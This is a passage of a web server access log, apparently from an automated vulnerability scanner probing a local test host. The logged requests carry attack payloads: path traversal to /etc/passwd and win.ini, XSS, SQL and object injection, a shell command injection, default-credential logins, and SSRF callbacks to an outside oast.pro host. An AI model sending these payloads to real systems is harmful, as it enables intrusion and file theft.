HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"Name=admin&Pass=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /manager/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.php?profile=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29N5EkktS4EZHkaMl5VEQzHYgNc/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(29N5EkM5Z596qOxuPqIMUmlHNFB)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29N5EgWe0PW5fVqx7Q4UXJMY3VX')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plesk-stat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy.stream?origin=http://ca2tuc8smpv1g2s80ca0khj65ujwzgj8f.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /(download)/tmp/poc.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common_page/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22bulk\x22,\x0D\x0A \x22source\x22: \x22default\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22: \x22run_sql\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22source\x22:\x22default\x22,\x0D\x0A \x22sql\x22:\x22SELECT pg_read_file('/etc/passwd',0,100000);\x22,\x0D\x0A \x22cascade\x22: false,\x0D\x0A \x22read_only\x22: false\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"form_hf_0=&url=http://ca2tuc8smpv1g2s80ca09uo843jbxshe7.oast.pro/geoserver/../&body=&username=&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/TestWfsPost HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base_import/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/24 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0A/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Reports/Pages/Folder.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LTX_navi.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/25 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"action=test&configuration=O:10:\x22PMA_Config\x22:1:{s:6:\x22source\x22,s:11:\x22/etc/passwd\x22;}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scripts/setup.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%3B/monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=/etc/passwd%00 